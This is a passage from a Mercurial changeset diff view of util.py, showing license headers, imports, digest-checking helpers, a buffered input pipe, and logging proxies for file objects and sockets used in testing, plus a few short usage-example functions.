util: lower water mark when removing nodes after cost limit reached...
Gregory Szorc
r39606:f296c0b3 default
@@ -1,3978 +1,3988 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # python 2.6 still has deprecation warnings enabled by default. We do not
145 145 # want to display anything to standard users, so detect if we are running
146 146 # tests and only use python deprecation warnings in this case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue an python native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % key)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
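# A minimal usage sketch for digestchecker (not exercised by the module
# itself); the md5 value is the real digest of b'foo', as in the digester
# doctest above:
def _exampledigestchecker():
    import io
    fh = io.BytesIO(b'foo')
    checked = digestchecker(fh, 3,
                            {b'md5': b'acbd18db4cc2f85cedef654fccc4a4d8'})
    while checked.read(2):
        pass
    checked.validate()  # raises error.Abort on size or digest mismatch
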
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class lets us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True is any data is currently buffered
309 309
310 310 This will be used externally a pre-step for polling IO. If there is
311 311 already data then no polling should be set in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapses it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
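# A minimal sketch of the intended buffer/polling collaboration, assuming
# ``fh`` is the read end of a pipe (e.g. a subprocess's stdout):
def _examplebufferedinputpipe(fh):
    import select
    pipe = bufferedinputpipe(fh)
    # Data already sitting in our buffer would not wake select(), so only
    # poll when the buffer is known to be empty.
    if not pipe.hasbuffer:
        select.select([pipe.fileno()], [], [])
    return pipe.readline()
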
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
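# A minimal sketch, assuming ``path`` names an existing file: mmapread()
# accepts a file object or a raw descriptor, and maps empty files to ''.
def _examplemmapread(path):
    with open(path, 'rb') as fp:
        data = mmapread(fp)
        return len(data)
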
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed is a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_into', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the number of bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
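# A minimal sketch, assuming ``logfh`` is a writable log handle and ``fh``
# is the file object under observation:
def _examplemakeloggingfileobject(logfh, fh):
    proxy = makeloggingfileobject(logfh, fh, b'example', logdata=True)
    proxy.write(b'hello\n')  # logfh gets "example> write(6) -> 6" + payload
    proxy.flush()            # logfh gets "example> flush() -> None"
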
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
